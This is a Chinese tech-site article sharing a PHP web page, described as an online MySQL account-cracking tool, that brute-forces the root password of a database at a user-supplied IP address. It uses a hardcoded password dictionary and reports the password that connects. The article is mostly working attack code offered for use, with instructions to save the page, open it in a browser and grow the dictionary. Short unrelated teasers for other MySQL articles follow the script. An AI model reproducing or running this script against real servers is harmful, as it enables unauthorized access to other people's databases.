PHP版Mysql爆破小腳本
更新時(shí)間:2016年10月16日 20:12:58 投稿:hebedich
本文給大家分享的是使用php實(shí)現(xiàn)暴力破解mysql的小腳本代碼,非常的好用,有需要的小伙伴可以參考下
Mysql PHP版本爆破小腳本
(注意:從代碼可以看出用戶名是個(gè)變量,一般數(shù)據(jù)庫賬號(hào)不會(huì)變,所以用戶名沒用數(shù)組作為字典。密碼是用數(shù)組作為字典。字典可根據(jù)規(guī)矩?cái)U(kuò)展,破解的成功與失敗,就看你擴(kuò)展的字典強(qiáng)大不強(qiáng)大了。用法:保存代碼為MysqlDatabaseBlasting.php,瀏覽器打開就可使用。 )
/*
* author:Bearcat 2016-10-5
*/
<html>
<head>
<title>Mysql賬號(hào)密碼爆破工具</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<br><br>
<h1>MysqlDatabaseBlasting(Mysql賬號(hào)密碼在線爆破工具 V1.0)</h1>
<br>
<?php
if(@$_POST['submit']){
$host = @$_POST['host'];
if($host!=""){
$username = "root";//用戶名字典
$password = array('','123456','admin','root','ccf304vn'); //密碼字典
echo "<hr><br>--------------------爆破狀態(tài)--------------------<br>";
echo "密碼錯(cuò)誤次數(shù):";
for ($i=0; $i <= count($password); $i++) {
if(@mysql_connect($host, $username, $password[$i])){
echo "<br><br><font color='red'>爆破成功--密碼-->".@$password[$i]."</font>";
break;
}else{
echo $i."、";
continue;
}
}
echo "<br>--------------------爆破結(jié)束--------------------<br><hr>";
}else{
echo "<script>alert('黑客,輸入數(shù)據(jù)庫IP地址')</script>";
}
}
?>
<br><br><br><br>
<form action="MysqlDatabaseBlasting.php" method="post">
數(shù)據(jù)庫IP地址:<input type="text" name="host"/>
<input type="submit" value="爆破" name="submit"/>
</form>
<center>
</body>
</html>
相關(guān)文章
MySQL INNER JOIN 的底層實(shí)現(xiàn)原理分析
這篇文章主要介紹了MySQL INNER JOIN 的底層實(shí)現(xiàn)原理,INNER JOIN的工作分為篩選和連接兩個(gè)步驟,連接時(shí)可以使用多種算法,通過本文,我們深入了解了MySQL中INNER JOIN的底層實(shí)現(xiàn)原理,需要的朋友可以參考下2023-06-06
三種東西永遠(yuǎn)不要放到mysql數(shù)據(jù)庫里
這篇文章主要介紹了mysql數(shù)據(jù)庫不能存儲(chǔ)的三樣?xùn)|西,需要的朋友可以參考下2014-06-06
MariaDB 新版本實(shí)力逆襲不僅僅是 MySQL 替代品
MariaDB是MySQL源代碼的一個(gè)分支,主要由開源社區(qū)在維護(hù),采用GPL授權(quán)許可。MariaDB 10.0和MySQL 5.6的不同之處有那些,MariaDB和Percona有什么不同呢?下面通過本文詳細(xì)了解下吧2016-12-12

